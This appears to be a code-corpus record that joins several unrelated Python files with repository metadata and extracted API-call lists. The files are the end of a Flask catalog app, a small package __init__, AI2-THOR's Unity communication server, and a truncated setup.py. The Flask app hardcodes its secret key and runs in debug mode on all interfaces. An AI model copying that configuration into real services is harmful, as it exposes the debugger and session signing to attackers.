        return redirect(url_for('showCategoryItem', category=categoryItem.name,
                                item=itemToDelete.name))
    if request.method == 'POST':
        session.delete(itemToDelete)
        session.commit()
        flash('Item Successfully Deleted')
        return redirect(url_for('showCatalog'))
    else:
        return render_template('deletecategoryitem.html',
                               category=categoryItem.name,
                               item=itemToDelete.name)


if __name__ == '__main__':
    app.secret_key = 'N10kuN!'
    app.debug = True
    app.run(host='0.0.0.0', port=5000)
[((448, 463), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (453, 463), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((905, 942), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///catalog.db"""'], {}), "('sqlite:///catalog.db')\n", (918, 942), False, 'from sqlalchemy import create_engine, asc\n'), ((984, 1009), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (996, 1009), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1154, 1183), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (1169, 1183), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((5104, 5212), 'models.User', 'User', ([], {'username': "login_session['username']", 'email': "login_session['email']", 'picture': "login_session['picture']"}), "(username=login_session['username'], email=login_session['email'],\n picture=login_session['picture'])\n", (5108, 5212), False, 'from models import Base, Category, Item, User\n'), ((6374, 6467), 'flask.jsonify', 'jsonify', ([], {'Categories': '[c.serialize for c in categories]', 'Items': '[i.serialize for i in items]'}), '(Categories=[c.serialize for c in categories], Items=[i.serialize for\n i in items])\n', (6381, 6467), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((6724, 6809), 'flask.jsonify', 'jsonify', ([], {'Categories': '[itemCategory.serialize]', 'Items': '[i.serialize for i in items]'}), '(Categories=[itemCategory.serialize], Items=[i.serialize for i in items]\n )\n', (6731, 6809), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7128, 7193), 'flask.jsonify', 'jsonify', ([], {'Category': '[itemCategory.serialize]', 'Item': '[item.serialize]'}), '(Category=[itemCategory.serialize], Item=[item.serialize])\n', (7135, 7193), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8953, 9046), 'flask.render_template', 'render_template', (['"""categoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('categoryitem.html', item=item, category=category,\n categories=categories)\n", (8968, 9046), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((2218, 2233), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (2231, 2233), False, 'import httplib2\n'), ((2937, 2978), 'requests.get', 'requests.get', (['userinfo_url'], {'params': 'params'}), '(userinfo_url, params=params)\n', (2949, 2978), False, 'import requests\n'), ((2994, 3017), 'json.loads', 'json.loads', (['answer.text'], {}), '(answer.text)\n', (3004, 3017), False, 'import json\n'), ((5957, 6004), 'flask.flash', 'flash', (['"""You have been successfully logged out."""'], {}), "('You have been successfully logged out.')\n", (5962, 6004), False, 'from flask import url_for, flash, make_response\n'), ((6071, 6107), 'flask.flash', 'flash', (['"""No user has been logged in."""'], {}), "('No user has been logged in.')\n", (6076, 6107), False, 'from flask import url_for, flash, make_response\n'), ((7483, 7556), 'flask.render_template', 'render_template', (['"""publiccatalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('publiccatalog.html', categories=categories, items=items)\n", (7498, 7556), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7613, 7680), 'flask.render_template', 'render_template', (['"""catalog.html"""'], 
{'categories': 'categories', 'items': 'items'}), "('catalog.html', categories=categories, items=items)\n", (7628, 7680), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8068, 8169), 'flask.render_template', 'render_template', (['"""publiccategory.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('publiccategory.html', items=items, category=itemCategory,\n categories=categories)\n", (8083, 8169), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8253, 8348), 'flask.render_template', 'render_template', (['"""category.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('category.html', items=items, category=itemCategory,\n categories=categories)\n", (8268, 8348), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8784, 8883), 'flask.render_template', 'render_template', (['"""publiccategoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('publiccategoryitem.html', item=item, category=category,\n categories=categories)\n", (8799, 8883), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9229, 9247), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (9237, 9247), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9528, 9646), 'models.Item', 'Item', ([], {'name': "request.form['name']", 'description': "request.form['description']", 'category_id': 'category.id', 'user_id': 'user.id'}), "(name=request.form['name'], description=request.form['description'],\n category_id=category.id, user_id=user.id)\n", (9532, 9646), False, 'from models import Base, Category, Item, User\n'), ((9885, 9947), 'flask.render_template', 'render_template', (['"""newcategoryitem.html"""'], {'categories': 'categories'}), "('newcategoryitem.html', categories=categories)\n", (9900, 9947), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((10134, 10152), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (10142, 10152), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11183, 11216), 'flask.flash', 'flash', (['"""Item Successfully Edited"""'], {}), "('Item Successfully Edited')\n", (11188, 11216), False, 'from flask import url_for, flash, make_response\n'), ((11416, 11557), 'flask.render_template', 'render_template', (['"""editcategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name', 'categories': 'categories', 'editedItem': 'editedItem'}), "('editcategoryitem.html', category=categoryItem.name, item=\n editedItem.name, categories=categories, editedItem=editedItem)\n", (11431, 11557), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11838, 11856), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (11846, 11856), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((12465, 12499), 'flask.flash', 'flash', (['"""Item Successfully Deleted"""'], {}), "('Item Successfully Deleted')\n", (12470, 12499), False, 'from flask import url_for, flash, make_response\n'), ((12573, 12672), 'flask.render_template', 'render_template', (['"""deletecategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('deletecategoryitem.html', category=categoryItem.name, item\n =itemToDelete.name)\n", 
(12588, 12672), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((1540, 1596), 'oauth2client.client.flow_from_clientsecrets', 'flow_from_clientsecrets', (['"""client_secrets.json"""'], {'scope': '""""""'}), "('client_secrets.json', scope='')\n", (1563, 1596), False, 'from oauth2client.client import flow_from_clientsecrets\n'), ((3465, 3480), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3478, 3480), False, 'import httplib2\n'), ((3779, 3794), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3792, 3794), False, 'import httplib2\n'), ((6029, 6051), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6036, 6051), False, 'from flask import url_for, flash, make_response\n'), ((6132, 6154), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6139, 6154), False, 'from flask import url_for, flash, make_response\n'), ((9836, 9858), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (9843, 9858), False, 'from flask import url_for, flash, make_response\n'), ((10586, 10663), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name'}), "('showCategoryItem', category=categoryItem.name, item=editedItem.name)\n", (10593, 10663), False, 'from flask import url_for, flash, make_response\n'), ((11241, 11330), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': "request.form['category']", 'item': 'editedItem.name'}), "('showCategoryItem', category=request.form['category'], item=\n editedItem.name)\n", (11248, 11330), False, 'from flask import url_for, flash, make_response\n'), ((12249, 12328), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('showCategoryItem', category=categoryItem.name, item=itemToDelete.name)\n", (12256, 12328), False, 'from flask import url_for, flash, make_response\n'), ((12524, 12546), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (12531, 12546), False, 'from flask import url_for, flash, make_response\n'), ((1844, 1899), 'json.dumps', 'json.dumps', (['"""Failed to upgrade the authorization code."""'], {}), "('Failed to upgrade the authorization code.')\n", (1854, 1899), False, 'import json\n')]
nooproject/noo
noo/impl/utils/__init__.py
238711c55faeb1226a4e5339cd587a312c4babac
from .echo import echo, set_quiet
from .errors import NooException, cancel
from .store import STORE, FileStore, Store

__all__ = (
    "FileStore",
    "NooException",
    "Store",
    "STORE",
    "cancel",
    "echo",
    "set_quiet",
)
[]
aliang8/ai2thor
ai2thor/server.py
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.server

Handles all communication with Unity through a Flask service. Messages
are sent to the controller using a pair of request/response queues.
"""
import json
import logging
import sys
import os
import os.path
try:
    from queue import Empty
except ImportError:
    from Queue import Empty
import time
import warnings

from flask import Flask, request, make_response, abort
import werkzeug
import werkzeug.serving
import werkzeug.http
import numpy as np
from enum import Enum

from ai2thor.util.depth import apply_real_noise, generate_noise_indices

logging.getLogger('werkzeug').setLevel(logging.ERROR)

werkzeug.serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'

MAX_DEPTH = 5000


# get with timeout to allow quit
def queue_get(que):
    res = None
    while True:
        try:
            res = que.get(block=True, timeout=0.5)
            break
        except Empty:
            pass
    return res


class NumpyAwareEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, np.generic):
            return np.asscalar(obj)
        return super(NumpyAwareEncoder, self).default(obj)


class BufferedIO(object):
    def __init__(self, wfile):
        self.wfile = wfile
        self.data = []

    def write(self, output):
        self.data.append(output)

    def flush(self):
        self.wfile.write(b"".join(self.data))
        self.wfile.flush()

    def close(self):
        return self.wfile.close()

    @property
    def closed(self):
        return self.wfile.closed


class ThorRequestHandler(werkzeug.serving.WSGIRequestHandler):
    def run_wsgi(self):
        old_wfile = self.wfile
        self.wfile = BufferedIO(self.wfile)
        result = super(ThorRequestHandler, self).run_wsgi()
        self.wfile = old_wfile
        return result


class MultiAgentEvent(object):
    def __init__(self, active_agent_id, events):
        self._active_event = events[active_agent_id]
        self.metadata = self._active_event.metadata
        self.screen_width = self._active_event.screen_width
        self.screen_height = self._active_event.screen_height
        self.events = events
        self.third_party_camera_frames = []
        # XXX add methods for depth,sem_seg

    @property
    def cv2img(self):
        return self._active_event.cv2img

    def add_third_party_camera_image(self, third_party_image_data):
        self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))


def read_buffer_image(buf, width, height, flip_y=True, flip_x=False, dtype=np.uint8, flip_rb_colors=False):
    im_bytes = np.frombuffer(buf.tobytes(), dtype=dtype) if sys.version_info.major < 3 \
        else np.frombuffer(buf, dtype=dtype)
    im = im_bytes.reshape(height, width, -1)
    if flip_y:
        im = np.flip(im, axis=0)
    if flip_x:
        im = np.flip(im, axis=1)
    if flip_rb_colors:
        im = im[..., ::-1]

    return im


def unique_rows(arr, return_index=False, return_inverse=False):
    arr = np.ascontiguousarray(arr).copy()
    b = arr.view(np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
    if return_inverse:
        _, idx, inv = np.unique(b, return_index=True, return_inverse=True)
    else:
        _, idx = np.unique(b, return_index=True)
    unique = arr[idx]
    if return_index and return_inverse:
        return unique, idx, inv
    elif return_index:
        return unique, idx
    elif return_inverse:
        return unique, inv
    else:
        return unique


class Event(object):
    """
    Object that is returned from a call to controller.step().
    This class wraps the screenshot that Unity captures as well
    as the metadata sent about each object
    """

    def __init__(self, metadata):
        self.metadata = metadata
        self.screen_width = metadata['screenWidth']
        self.screen_height = metadata['screenHeight']

        self.frame = None
        self.depth_frame = None
        self.normals_frame = None
        self.flow_frame = None

        self.color_to_object_id = {}
        self.object_id_to_color = {}

        self.instance_detections2D = None
        self.instance_masks = {}
        self.class_masks = {}

        self.instance_segmentation_frame = None
        self.class_segmentation_frame = None

        self.class_detections2D = {}

        self.process_colors()
        self.process_visible_bounds2D()
        self.third_party_camera_frames = []
        self.third_party_class_segmentation_frames = []
        self.third_party_instance_segmentation_frames = []
        self.third_party_depth_frames = []
        self.third_party_normals_frames = []
        self.third_party_flows_frames = []

        self.events = [self]  # Ensure we have a similar API to MultiAgentEvent

    @property
    def image_data(self):
        warnings.warn("Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format")
        return None

    def process_visible_bounds2D(self):
        if self.instance_detections2D and len(self.instance_detections2D) > 0:
            for obj in self.metadata['objects']:
                obj['visibleBounds2D'] = (obj['visible'] and obj['objectId'] in self.instance_detections2D)

    def process_colors(self):
        if 'colors' in self.metadata and self.metadata['colors']:
            for color_data in self.metadata['colors']:
                name = color_data['name']
                c_key = tuple(color_data['color'])
                self.color_to_object_id[c_key] = name
                self.object_id_to_color[name] = c_key

    def objects_by_type(self, object_type):
        return [obj for obj in self.metadata['objects'] if obj['objectType'] == object_type]

    def process_colors_ids(self):
        if self.instance_segmentation_frame is None:
            return

        MIN_DETECTION_LEN = 0

        self.instance_detections2D = {}
        unique_ids, unique_inverse = unique_rows(self.instance_segmentation_frame.reshape(-1, 3), return_inverse=True)
        unique_inverse = unique_inverse.reshape(self.instance_segmentation_frame.shape[:2])
        unique_masks = (np.tile(unique_inverse[np.newaxis, :, :], (len(unique_ids), 1, 1)) == np.arange(len(unique_ids))[:, np.newaxis, np.newaxis])
        #for unique_color_ind, unique_color in enumerate(unique_ids):
        for color_bounds in self.metadata['colorBounds']:
            color = np.array(color_bounds['color'])
            color_name = self.color_to_object_id.get(tuple(int(cc) for cc in color), 'background')
            cls = color_name
            simObj = False
            if '|' in cls:
                cls = cls.split('|')[0]
                simObj = True

            bb = np.array(color_bounds['bounds'])
            bb[[1,3]] = self.metadata['screenHeight'] - bb[[3,1]]
            if not((bb[2] - bb[0]) < MIN_DETECTION_LEN or (bb[3] - bb[1]) < MIN_DETECTION_LEN):
                if cls not in self.class_detections2D:
                    self.class_detections2D[cls] = []

                self.class_detections2D[cls].append(bb)

                color_ind = np.argmin(np.sum(np.abs(unique_ids - color), axis=1))
                if simObj:
                    self.instance_detections2D[color_name] = bb
                    self.instance_masks[color_name] = unique_masks[color_ind, ...]

                if cls not in self.class_masks:
                    self.class_masks[cls] = unique_masks[color_ind, ...]
                else:
                    self.class_masks[cls] = np.logical_or(self.class_masks[cls], unique_masks[color_ind, ...])

    def _image_depth(self, image_depth_data, **kwargs):
        image_depth = read_buffer_image(image_depth_data, self.screen_width, self.screen_height)
        depth_format = kwargs['depth_format']
        image_depth_out = image_depth[:,:,0] + image_depth[:,:,1] / np.float32(256) + image_depth[:,:,2] / np.float32(256 ** 2)
        multiplier = 1.0

        if depth_format != DepthFormat.Normalized:
            multiplier = kwargs['camera_far_plane'] - kwargs['camera_near_plane']
        elif depth_format == DepthFormat.Millimeters:
            multiplier *= 1000

        image_depth_out *= multiplier / 256.0

        depth_image_float = image_depth_out.astype(np.float32)

        if 'add_noise' in kwargs and kwargs['add_noise']:
            depth_image_float = apply_real_noise(
                depth_image_float, self.screen_width, indices=kwargs['noise_indices']
            )

        return depth_image_float

    def add_image_depth_robot(self, image_depth_data, depth_format, **kwargs):
        multiplier = 1.0
        camera_far_plane = kwargs.pop('camera_far_plane', 1)
        camera_near_plane = kwargs.pop('camera_near_plane', 0)

        if depth_format == DepthFormat.Normalized:
            multiplier = 1.0 / (camera_far_plane - camera_near_plane)
        elif depth_format == DepthFormat.Millimeters:
            multiplier = 1000.0

        image_depth = read_buffer_image(
            image_depth_data, self.screen_width, self.screen_height, **kwargs
        ).reshape(self.screen_height, self.screen_width) * multiplier
        self.depth_frame = image_depth.astype(np.float32)

    def add_image_depth(self, image_depth_data, **kwargs):
        self.depth_frame = self._image_depth(image_depth_data, **kwargs)

    def add_third_party_image_depth(self, image_depth_data, **kwargs):
        self.third_party_depth_frames.append(self._image_depth(image_depth_data, **kwargs))

    def add_third_party_image_normals(self, normals_data):
        self.third_party_normals_frames.append(read_buffer_image(normals_data, self.screen_width, self.screen_height))

    def add_image_normals(self, image_normals_data):
        self.normals_frame = read_buffer_image(image_normals_data, self.screen_width, self.screen_height)

    def add_third_party_image_flows(self, flows_data):
        self.third_party_flows_frames.append(read_buffer_image(flows_data, self.screen_width, self.screen_height))

    def add_image_flows(self, image_flows_data):
        self.flows_frame = read_buffer_image(image_flows_data, self.screen_width, self.screen_height)

    def add_third_party_camera_image(self, third_party_image_data):
        self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))

    def add_image(self, image_data, **kwargs):
        self.frame = read_buffer_image(image_data, self.screen_width, self.screen_height, **kwargs)

    def add_image_ids(self, image_ids_data):
        self.instance_segmentation_frame = read_buffer_image(image_ids_data, self.screen_width, self.screen_height)
        self.process_colors_ids()

    def add_third_party_image_ids(self, image_ids_data):
        self.third_party_instance_segmentation_frames.append(read_buffer_image(image_ids_data, self.screen_width, self.screen_height))

    def add_image_classes(self, image_classes_data):
        self.class_segmentation_frame = read_buffer_image(image_classes_data, self.screen_width, self.screen_height)

    def add_third_party_image_classes(self, image_classes_data):
        self.third_party_class_segmentation_frames.append(read_buffer_image(image_classes_data, self.screen_width, self.screen_height))

    def cv2image(self):
        warnings.warn("Deprecated - please use event.cv2img")
        return self.cv2img

    @property
    def cv2img(self):
        return self.frame[...,::-1]

    @property
    def pose(self):
        agent_meta = self.metadata['agent']
        loc = agent_meta['position']
        rotation = round(agent_meta['rotation']['y'] * 1000)
        horizon = round(agent_meta['cameraHorizon'] * 1000)

        return (round(loc['x'] * 1000), round(loc['z'] * 1000), rotation, horizon)

    @property
    def pose_discrete(self):
        # XXX should have this as a parameter
        step_size = 0.25
        agent_meta = self.metadata['agent']
        loc = agent_meta['position']
        rotation = int(agent_meta['rotation']['y'] / 90.0)
        horizon = int(round(agent_meta['cameraHorizon']))

        return (int(loc['x'] / step_size), int(loc['z'] / step_size), rotation, horizon)

    def get_object(self, object_id):
        for obj in self.metadata['objects']:
            if obj['objectId'] == object_id:
                return obj
        return None


class MultipartFormParser(object):

    @staticmethod
    def get_boundary(request_headers):
        for h, value in request_headers:
            if h == 'Content-Type':
                ctype, ct_opts = werkzeug.http.parse_options_header(value)
                boundary = ct_opts['boundary'].encode('ascii')
                return boundary
        return None

    def __init__(self, data, boundary):
        self.form = {}
        self.files = {}

        full_boundary = b'\r\n--' + boundary
        view = memoryview(data)
        i = data.find(full_boundary)
        while i >= 0:
            next_offset = data.find(full_boundary, i + len(full_boundary))
            if next_offset < 0:
                break
            headers_offset = i + len(full_boundary) + 2
            body_offset = data.find(b'\r\n\r\n', headers_offset)
            raw_headers = view[headers_offset: body_offset]
            body = view[body_offset + 4: next_offset]
            i = next_offset

            headers = {}
            for header in raw_headers.tobytes().decode('ascii').strip().split("\r\n"):
                k,v = header.split(':')
                headers[k.strip()] = v.strip()

            ctype, ct_opts = werkzeug.http.parse_options_header(headers['Content-Type'])
            cdisp, cd_opts = werkzeug.http.parse_options_header(headers['Content-disposition'])
            assert cdisp == 'form-data'

            if 'filename' in cd_opts:
                if cd_opts['name'] not in self.files:
                    self.files[cd_opts['name']] = []

                self.files[cd_opts['name']].append(body)
            else:
                if ctype == 'text/plain' and 'charset' in ct_opts:
                    body = body.tobytes().decode(ct_opts['charset'])

                if cd_opts['name'] not in self.form:
                    self.form[cd_opts['name']] = []

                self.form[cd_opts['name']].append(body)


class DepthFormat(Enum):
    Meters = 0,
    Normalized = 1,
    Millimeters = 2


class Server(object):

    def __init__(
            self,
            request_queue,
            response_queue,
            host,
            port=0,
            threaded=False,
            depth_format=DepthFormat.Meters,
            add_depth_noise=False,
            width=300,
            height=300
    ):

        app = Flask(__name__,
                    template_folder=os.path.realpath(
                        os.path.join(
                            os.path.dirname(os.path.abspath(__file__)), '..', 'templates')))

        self.image_buffer = None

        self.app = app
        self.client_token = None
        self.subscriptions = []
        self.app.config.update(PROPAGATE_EXCEPTIONS=False, JSONIFY_PRETTYPRINT_REGULAR=False)
        self.port = port
        self.last_rate_timestamp = time.time()
        self.frame_counter = 0
        self.debug_frames_per_interval = 50
        self.xwindow_id = None
        self.wsgi_server = werkzeug.serving.make_server(host, self.port, self.app, threaded=threaded, request_handler=ThorRequestHandler)
        # used to ensure that we are receiving frames for the action we sent
        self.sequence_id = 0
        self.last_event = None
        self.camera_near_plane = 0.1
        self.camera_far_plane = 20.0
        self.depth_format = depth_format
        self.add_depth_noise = add_depth_noise
        self.noise_indices = None

        if add_depth_noise:
            assert width == height,\
                "Noise supported with square dimension images only."
            self.noise_indices = generate_noise_indices(width)

        @app.route('/ping', methods=['get'])
        def ping():
            return 'pong'

        @app.route('/train', methods=['post'])
        def train():
            if request.headers['Content-Type'].split(';')[0] == 'multipart/form-data':
                form = MultipartFormParser(request.get_data(), MultipartFormParser.get_boundary(request.headers))
                metadata = json.loads(form.form['metadata'][0])
                token = form.form['token'][0]
            else:
                form = request
                metadata = json.loads(form.form['metadata'])
                token = form.form['token']

            if self.client_token and token != self.client_token:
                abort(403)

            if self.frame_counter % self.debug_frames_per_interval == 0:
                now = time.time()
                # rate = self.debug_frames_per_interval / float(now - self.last_rate_timestamp)
                self.last_rate_timestamp = now
                # import datetime
                # print("%s %s/s" % (datetime.datetime.now().isoformat(), rate))

            if metadata['sequenceId'] != self.sequence_id:
                raise ValueError("Sequence id mismatch: %s vs %s" % (
                    metadata['sequenceId'], self.sequence_id))

            events = []
            for i, a in enumerate(metadata['agents']):
                e = Event(a)
                image_mapping = dict(
                    image=e.add_image,
                    image_depth=lambda x: e.add_image_depth(
                        x,
                        depth_format=self.depth_format,
                        camera_near_plane=self.camera_near_plane,
                        camera_far_plane=self.camera_far_plane,
                        add_noise=self.add_depth_noise,
                        noise_indices=self.noise_indices
                    ),
                    image_ids=e.add_image_ids,
                    image_classes=e.add_image_classes,
                    image_normals=e.add_image_normals,
                    image_flows=e.add_image_flows
                )

                for key in image_mapping.keys():
                    if key in form.files:
                        image_mapping[key](form.files[key][i])

                third_party_image_mapping = dict(
                    image=e.add_image,
                    image_thirdParty_depth=lambda x: e.add_third_party_image_depth(
                        x,
                        depth_format=self.depth_format,
                        camera_near_plane=self.camera_near_plane,
                        camera_far_plane=self.camera_far_plane
                    ),
                    image_thirdParty_image_ids=e.add_third_party_image_ids,
                    image_thirdParty_classes=e.add_third_party_image_classes,
                    image_thirdParty_normals=e.add_third_party_image_normals,
                    image_thirdParty_flows=e.add_third_party_image_flows
                )

                if a['thirdPartyCameras'] is not None:
                    for ti, t in enumerate(a['thirdPartyCameras']):
                        for key in third_party_image_mapping.keys():
                            if key in form.files:
                                third_party_image_mapping[key](form.files[key][ti])
                events.append(e)

            if len(events) > 1:
                self.last_event = event = MultiAgentEvent(metadata['activeAgentId'], events)
            else:
                self.last_event = event = events[0]

            for img in form.files.get('image-thirdParty-camera', []):
                self.last_event.add_third_party_camera_image(img)

            request_queue.put_nowait(event)
            self.frame_counter += 1

            next_action = queue_get(response_queue)
            if 'sequenceId' not in next_action:
                self.sequence_id += 1
                next_action['sequenceId'] = self.sequence_id
            else:
                self.sequence_id = next_action['sequenceId']

            resp = make_response(json.dumps(next_action, cls=NumpyAwareEncoder))

            return resp

    def start(self):
        self.wsgi_server.serve_forever()

    def set_init_params(self, init_params):
        self.camera_near_plane = init_params['cameraNearPlane']
        self.camera_far_plane = init_params['cameraFarPlane']
[((633, 662), 'logging.getLogger', 'logging.getLogger', (['"""werkzeug"""'], {}), "('werkzeug')\n", (650, 662), False, 'import logging\n'), ((2804, 2835), 'numpy.frombuffer', 'np.frombuffer', (['buf'], {'dtype': 'dtype'}), '(buf, dtype=dtype)\n', (2817, 2835), True, 'import numpy as np\n'), ((2909, 2928), 'numpy.flip', 'np.flip', (['im'], {'axis': '(0)'}), '(im, axis=0)\n', (2916, 2928), True, 'import numpy as np\n'), ((2957, 2976), 'numpy.flip', 'np.flip', (['im'], {'axis': '(1)'}), '(im, axis=1)\n', (2964, 2976), True, 'import numpy as np\n'), ((3168, 3222), 'numpy.dtype', 'np.dtype', (['(np.void, arr.dtype.itemsize * arr.shape[1])'], {}), '((np.void, arr.dtype.itemsize * arr.shape[1]))\n', (3176, 3222), True, 'import numpy as np\n'), ((3269, 3321), 'numpy.unique', 'np.unique', (['b'], {'return_index': '(True)', 'return_inverse': '(True)'}), '(b, return_index=True, return_inverse=True)\n', (3278, 3321), True, 'import numpy as np\n'), ((3349, 3380), 'numpy.unique', 'np.unique', (['b'], {'return_index': '(True)'}), '(b, return_index=True)\n', (3358, 3380), True, 'import numpy as np\n'), ((4918, 5054), 'warnings.warn', 'warnings.warn', (['"""Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format"""'], {}), "(\n 'Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format'\n )\n", (4931, 5054), False, 'import warnings\n'), ((11435, 11488), 'warnings.warn', 'warnings.warn', (['"""Deprecated - please use event.cv2img"""'], {}), "('Deprecated - please use event.cv2img')\n", (11448, 11488), False, 'import warnings\n'), ((15304, 15315), 'time.time', 'time.time', ([], {}), '()\n', (15313, 15315), False, 'import time\n'), ((15449, 15563), 'werkzeug.serving.make_server', 'werkzeug.serving.make_server', (['host', 'self.port', 'self.app'], {'threaded': 'threaded', 'request_handler': 'ThorRequestHandler'}), '(host, self.port, self.app, threaded=threaded,\n request_handler=ThorRequestHandler)\n', (15477, 15563), False, 'import werkzeug\n'), ((1125, 1141), 'numpy.asscalar', 'np.asscalar', (['obj'], {}), '(obj)\n', (1136, 1141), True, 'import numpy as np\n'), ((3118, 3143), 'numpy.ascontiguousarray', 'np.ascontiguousarray', (['arr'], {}), '(arr)\n', (3138, 3143), True, 'import numpy as np\n'), ((6520, 6551), 'numpy.array', 'np.array', (["color_bounds['color']"], {}), "(color_bounds['color'])\n", (6528, 6551), True, 'import numpy as np\n'), ((6822, 6854), 'numpy.array', 'np.array', (["color_bounds['bounds']"], {}), "(color_bounds['bounds'])\n", (6830, 6854), True, 'import numpy as np\n'), ((8468, 8560), 'ai2thor.util.depth.apply_real_noise', 'apply_real_noise', (['depth_image_float', 'self.screen_width'], {'indices': "kwargs['noise_indices']"}), "(depth_image_float, self.screen_width, indices=kwargs[\n 'noise_indices'])\n", (8484, 8560), False, 'from ai2thor.util.depth import apply_real_noise, generate_noise_indices\n'), ((13697, 13756), 'werkzeug.http.parse_options_header', 'werkzeug.http.parse_options_header', (["headers['Content-Type']"], {}), "(headers['Content-Type'])\n", (13731, 13756), False, 'import werkzeug\n'), ((13786, 13852), 'werkzeug.http.parse_options_header', 'werkzeug.http.parse_options_header', (["headers['Content-disposition']"], {}), "(headers['Content-disposition'])\n", (13820, 13852), False, 'import werkzeug\n'), ((16061, 16090), 'ai2thor.util.depth.generate_noise_indices', 'generate_noise_indices', (['width'], {}), '(width)\n', (16083, 16090), False, 'from ai2thor.util.depth 
import apply_real_noise, generate_noise_indices\n'), ((8003, 8023), 'numpy.float32', 'np.float32', (['(256 ** 2)'], {}), '(256 ** 2)\n', (8013, 8023), True, 'import numpy as np\n'), ((12691, 12732), 'werkzeug.http.parse_options_header', 'werkzeug.http.parse_options_header', (['value'], {}), '(value)\n', (12725, 12732), False, 'import werkzeug\n'), ((16481, 16517), 'json.loads', 'json.loads', (["form.form['metadata'][0]"], {}), "(form.form['metadata'][0])\n", (16491, 16517), False, 'import json\n'), ((16640, 16673), 'json.loads', 'json.loads', (["form.form['metadata']"], {}), "(form.form['metadata'])\n", (16650, 16673), False, 'import json\n'), ((16799, 16809), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (16804, 16809), False, 'from flask import Flask, request, make_response, abort\n'), ((16906, 16917), 'time.time', 'time.time', ([], {}), '()\n', (16915, 16917), False, 'import time\n'), ((20165, 20211), 'json.dumps', 'json.dumps', (['next_action'], {'cls': 'NumpyAwareEncoder'}), '(next_action, cls=NumpyAwareEncoder)\n', (20175, 20211), False, 'import json\n'), ((7629, 7695), 'numpy.logical_or', 'np.logical_or', (['self.class_masks[cls]', 'unique_masks[color_ind, ...]'], {}), '(self.class_masks[cls], unique_masks[color_ind, ...])\n', (7642, 7695), True, 'import numpy as np\n'), ((7964, 7979), 'numpy.float32', 'np.float32', (['(256)'], {}), '(256)\n', (7974, 7979), True, 'import numpy as np\n'), ((16383, 16401), 'flask.request.get_data', 'request.get_data', ([], {}), '()\n', (16399, 16401), False, 'from flask import Flask, request, make_response, abort\n'), ((7229, 7255), 'numpy.abs', 'np.abs', (['(unique_ids - color)'], {}), '(unique_ids - color)\n', (7235, 7255), True, 'import numpy as np\n'), ((14978, 15003), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (14993, 15003), False, 'import os\n')]
ooreilly/mydocstring
setup.py
077cebfb86575914d343bd3291b9e6c5e8beef94
from setuptools import setup

setup(name='mydocstring',
      version='0.2.7',
      description="""A tool for extracting and converting Google-style docstrings to
      plain-text, markdown, and JSON.""",
      url='http://github.com/ooreilly/mydocstring',
      author="Ossian O'Reilly",
      license='MIT',
      packages=['mydocstring'],
      install_requires=['mako', 'docopt'],
      entry_points = {
          'console_scripts': [
              'mydocstring=mydocstring.docstring:main',
          ],},
      package_data={'mydocstring': ['templates/google_docstring.md']},
